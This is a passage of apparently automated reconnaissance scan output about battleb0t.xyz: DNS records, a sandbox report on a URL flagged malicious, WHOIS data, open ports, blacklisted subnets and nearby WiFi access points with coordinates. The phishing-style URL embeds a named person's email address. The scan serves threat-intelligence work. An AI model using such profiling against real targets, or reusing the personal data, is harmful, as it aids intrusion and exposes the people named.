"trubbylove.laury.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:26.457996047Z"}, "blog.hiluohao.com": {"record_type": "CNAME", "resolved_at": "2023-03-28T14:57:36.831718722Z"}, "www.yusry.de": {"record_type": "CNAME", "resolved_at": "2023-04-23T16:48:40.403075909Z"}, "www.bboey.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:00:09.830879590Z"}, "xn--nschtos-n2a.de": {"record_type": "AAAA", "resolved_at": "2023-04-16T16:34:59.210581178Z"}, "treader.calbertts.com": {"record_type": "CNAME", "resolved_at": "2023-05-05T14:10:44.551458266Z"}, "data-observability-tag.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:12.630016737Z"}, "www.ttlresearch.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T20:20:06.761328463Z"}, "siuts.proekspert.ee": {"record_type": "CNAME", "resolved_at": "2023-02-08T17:06:34.527975069Z"}, "www.dannytran.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:34.941987381Z"}, "yanshouwang.dev": {"record_type": "AAAA", "resolved_at": "2023-03-21T00:21:54.271513621Z"}, "www.hiennguyen.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T12:59:42.443779889Z"}, "www.kiernanro.ch": {"record_type": "CNAME", "resolved_at": "2023-03-23T13:12:26.767995363Z"}, "database.jiny.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:19:55.315272389Z"}, "www.tcamba.dev": {"record_type": "CNAME", "resolved_at": "2023-03-23T17:56:56.616082497Z"}, "blog.brandonmathis.me": {"record_type": "CNAME", "resolved_at": "2023-03-21T21:08:33.485121539Z"}, "blog.limeira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:35.974650849Z"}, "www.nstech.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:46.912831706Z"}, "capital-commerce.com": {"record_type": "AAAA", "resolved_at": "2023-01-20T13:04:55.684473451Z"}, "www.maxnoll.eu": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:43:19.504818787Z"}, "reacticz.t0m.fr": {"record_type": "CNAME", "resolved_at": "2023-04-02T17:20:42.618600257Z"}, "help.programm-chest.dev": {"record_type": "CNAME", "resolved_at": "2022-11-30T14:37:46.643013242Z"}, "www.craftandtechnology.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T01:10:11.324465510Z"}, "opalab.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-16T04:35:35.248516488Z"}, "flagicons.lipis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:16.844777559Z"}, "www.danieljulio.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T14:08:52.867040001Z"}, "www.cnlei.com": {"record_type": "CNAME", "resolved_at": "2023-02-28T13:43:40.358046729Z"}, "www.aashish.dev": {"record_type": "CNAME", "resolved_at": "2023-04-19T19:07:09.565393850Z"}, "www.titanstudios.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:47.515393867Z"}, "www.functionbetter.fit": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:32:53.588221818Z"}, "rtlien.coleprice.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T14:54:52.339226041Z"}, "www.matthewpereira.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T21:28:16.599843999Z"}, "docs.telestion.wuespace.de": {"record_type": "CNAME", "resolved_at": "2023-05-01T16:17:39.668319874Z"}, "shop4data-ui.docs.collibra.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:31.647476511Z"}, "resume.chann.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:16:20.658403265Z"}, "www.wazted.fr": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:32:27.312675959Z"}, "www.mtconnectcore.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T14:59:11.184709249Z"}, "www.aloha.org.cn": {"record_type": "CNAME", "resolved_at": "2022-12-14T12:40:48.602824216Z"}, "www.mangato.es": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:31:05.591550189Z"}, "www.williamjang.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:39.271340346Z"}, "www.saiko-no-chimu.fr": {"record_type": "CNAME", "resolved_at": "2023-04-13T02:41:03.551470009Z"}, "reitti.vanhala.fi": {"record_type": "CNAME", "resolved_at": "2023-05-05T16:50:09.151032357Z"}, "myreads.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-02-26T21:11:31.059545269Z"}, "www.deltaprowashllc.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:11:27.189924094Z"}, "www.stevesarmiento.com": {"record_type": "CNAME", "resolved_at": "2022-11-11T13:54:37.912711550Z"}, "stevenbone.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T02:37:36.462044411Z"}, "www.dwivedula.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T15:37:48.541873098Z"}, "sidecycle.com": {"record_type": "AAAA", "resolved_at": "2022-11-20T14:02:08.191705875Z"}, "playbook.truss.works": {"record_type": "CNAME", "resolved_at": "2023-04-30T04:35:55.131404897Z"}, "www.ousmane.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T15:03:29.723057364Z"}, "www.shira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:45:59.585738764Z"}, "www.charliegillespie.com": {"record_type": "CNAME", "resolved_at": "2023-04-08T14:40:51.472581029Z"}, "www.thyagajan.in": {"record_type": "CNAME", "resolved_at": "2023-02-04T15:11:06.016790048Z"}, "www.lawrencedunbar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:50:22.533060749Z"}, "www.coltonfalkner.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:40.169282211Z"}, "andressa.dev": {"record_type": "CNAME", "resolved_at": "2023-04-13T16:15:01.948884742Z"}, "www.dangillis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:20.930987816Z"}, "www.jasonscotto.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:01:31.543104004Z"}, "cedarpark.com": {"record_type": "AAAA", "resolved_at": "2023-03-22T15:00:17.822135807Z"}, "www.tacxtv.fr": {"record_type": "CNAME", "resolved_at": "2023-03-28T17:40:47.840300196Z"}, "www.ologn.dev": {"record_type": "CNAME", "resolved_at": "2023-02-14T15:37:29.279040979Z"}, "www.sreehari.dev": {"record_type": "CNAME", "resolved_at": "2023-03-14T15:27:59.231327405Z"}, "www.jenniferyaya.ca": {"record_type": "CNAME", "resolved_at": "2023-05-11T12:50:41.791793242Z"}, "www.grantanna.dev": {"record_type": "CNAME", "resolved_at": "2023-02-27T15:42:47.651834600Z"}, "web.thecatcloud.de": {"record_type": "CNAME", "resolved_at": "2023-04-30T22:07:01.094811475Z"}, "www.framy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:45.611656444Z"}, "www.oscarablinger.dev": {"record_type": "CNAME", "resolved_at": "2023-05-01T09:06:38.146245867Z"}, "abeziou.dev": {"record_type": "AAAA", "resolved_at": "2023-03-27T23:40:41.232028838Z"}, "www.valtech.engineering": {"record_type": "CNAME", "resolved_at": "2023-05-09T17:01:27.306622794Z"}, "www.lobber.se": {"record_type": "CNAME", "resolved_at": "2023-04-05T21:01:06.815879177Z"}, "www.codar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:54:18.450070838Z"}, "www.ky1vstar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:22.392376650Z"}}, "names": ["opalab.github.io", "www.yusry.de", "www.willbishop.dev", "datab | 2606:50c0:8003::153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:CF:BB:35) | 39.0469, -77.4903 |
| 2023-05-12 02:46:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://github.com/facebook/regenerator/blob/main/license', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 30, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3740:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3740:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3740:120:WilError_01"\n "Local\\SM0:7244:304:WilStaging_02"\n "SM0:7244:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:7244:120:WilError_01"\n "Local\\SM0:3740:304:WilStaging_02"\n "SM0:3740:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3740:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.40.106:443"\n "172.67.212.13:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "142.251.46.228:443"\n "142.251.32.35:443"\n "142.250.191.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "dev.protektnet.com"\n "llink.to"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""linkedin.com"," (Indicator: "linkedin.com")\n ""netflix.com"," (Indicator: "netflix.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""basbleu.com"," (Source: wallet-tokenization-config.json, Indicator: "leu.com")\n ""firehousesubs.com"," (Source: wallet-tokenization-config.json, Indicator: "ubs.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003740]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_1784626035\\shopping_fre.html]- [targetUID: 00000000-00003740]\n "a8ce5196df51c32c_0" has type "data"- [targetUID: N/A]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00003740]\n "1ac9cebe-dd88-4786-8bde-557b7c339a54.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 411849"- Location: [%TEMP%\\1ac9cebe-dd88-4786-8bde-557b7c339a54.tmp]- [targetUID: 00000000-00003740]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\index]- [targetUID: 00000000-00003740]\n "wallet-crypto.html" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00004772]\n "README.md" has type "ASCII text"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\json\\wallet\\README.md]- [targetUID: 00000000-00003740]\n "8aee08c3-0a5f-4923-9dc4-59aaf03dd9af.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8aee08c3-0a5f-4923-9dc4-59aaf03dd9af.tmp]- [targetUID: 00000000-00003740]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003740]\n "edge_driver.js.LICENSE.txt" has type "ASCII text"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\edge_driver.js.LICENSE.txt]- [targetUID: 00000000-00003740]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\json\\i18n-shared-components\\zh-Hant\\strings.json]- [targetUID: 00000000-00003740]\n "e155a2a9-b073-47a6-9624-313434670886.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e155a2a9-b073-47a6-9624-313434670886.tmp]- [targetUID: 00000000-00003740]\n "0d3f4a25-1508-478e-a9de-4edb5637407d.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\0d3f4a25-1508-478e-a9de-4edb5637407d.tmp]- [targetUID: 00000000-00004772]\n "wallet-tokenization-config.json" has type "ASCII text"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\json\\wallet\\wallet-tokenization-config.json]- [targetUID: 00000000-00003740]\n "runtime.bundle.js" has type "ASCII text with very long lines with no line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\runtime.bundle.js]- [targetUID: 00000000-00003740]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:""colourpop.com"," [Source: wallet-checkout-eligible-sites-pre-stable.json]\n Observed email domain:""shop.lovepop.com"," [Source: wallet-checkout-eligible-sites-pre-stable.json]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "www.gap.com"\n Pattern match: "www.gapfactory.com"\n Pattern match: "http://www.w3.org/2000/svg,className:r"\n Pattern match: "https://github.com/jsstyles/css-vendor"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com"\n Pattern match: "https://github.com/facebook/regenerator/blob/main/LICENSE"\n Pattern match: "https://track.salesflare.com/flare.js"\n Heuristic match: "api.salesflare.com"\n Heuristic match: "dev.protektnet.com"\n Pattern match: "https://dev.protektnet.com/MNU/site.php"\n Pattern match: "https://llink.to"\n Heuristic match: "llink.to"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "track.salesflare.com"\n Pattern match: "https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/css/main.64d85253.css,static_js_url:https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/js/main.f389f055.js,st | 185.199.111.153 |
| 2023-05-12 03:18:49 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://pics.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 03:35:46 | Malicious Co-Hosted Site | Yes | OpenDNS | 0 | 0 | 3 | 0 | None | Blocked by OpenDNS [000.lt] | 000.lt |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
| 2023-05-12 03:25:19 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | nwapi.battleb0t.xyz |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 130.97.148.34.bc.googleusercontent.com | 34.148.97.130 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom (Net ID: 00:01:38:A4:44:3A) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.189): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:27 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04XFP518R0GMRXREDYN35MZ
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:39:9A:88) | 50.1188, 8.6843 |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:80 | 188.114.97.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Colombia | 188.114.96.1 |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 128.97.148.34.bc.googleusercontent.com | 34.148.97.128 |
| 2023-05-12 03:09:13 | Affiliate - IP Address | No | DNS Look-aside | 2 | 0 | 3 | 0 | None | 207.154.228.167 | 207.154.228.169 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | iz-wpa (Net ID: 00:01:8E:1A:64:A6) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.225): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0101dd.github.io | 185.199.111.153 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c529effee343669-FRA
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.170): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SLK-Routers_091850 (Net ID: 00:02:2A:09:18:50) | 37.7642, -122.3993 |
| 2023-05-12 02:53:12 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | None None | panel.battleb0t.xyz |
| 2023-05-12 02:54:21 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | http://vscode.battleb0t.xyz/ | vscode.battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Catwoman (Net ID: 00:14:5C:89:45:BC) | 50.8897, 6.0563 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Connection": ["close"], "Server": ["cPanel"], "Host": ["87.248.157.102:2078"], "Www_Authenticate": ["Basic realm=\"Restricted Area\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:10:18 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [34.74.160.0/20]
http://www.voipbl.org/update | 34.74.160.0/20 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [002evapey.github.io]
https://www.openphish.com/feed.txt | 002evapey.github.io |
| 2023-05-12 02:45:48 | Physical Coordinates | No | AbstractAPI | 91 | 0 | 2 | 0 | None | 41.8781, -87.6298 | 104.21.6.166 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Rock Chalk (Net ID: 00:01:95:08:D8:04) | 37.7813933,-122.3918002 |
